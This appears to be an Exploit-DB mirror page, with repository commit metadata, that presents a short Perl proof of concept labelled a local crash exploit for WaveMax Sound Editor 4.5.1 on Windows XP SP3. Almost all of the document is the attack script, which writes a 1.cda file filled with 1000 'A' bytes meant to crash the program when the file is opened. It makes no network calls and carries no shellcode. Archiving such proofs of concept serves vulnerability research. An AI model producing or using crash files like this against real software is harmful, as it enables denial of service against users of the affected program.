exploit-db-mirror/exploits/windows/dos/15671.pl
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

20 lines
No EOL
376 B
Perl
Executable file

####
####
####Exploit Title: WaveMax Sound Editor 4.5.1 Local Crash PoC
####Software Link: http://www.wave-max.com/wavemax/
####Tested on: Win XP SP3
####Date: 04-12-2010
####Author: h1ch4m
####Email: h1ch4m@live.fr
####
####
my $file= "1.cda";
my $junk = "\x41" x 1000;
open($FILE,">$file");
print $FILE $junk;
close($FILE);
print "File Created successfully\n";
sleep(1);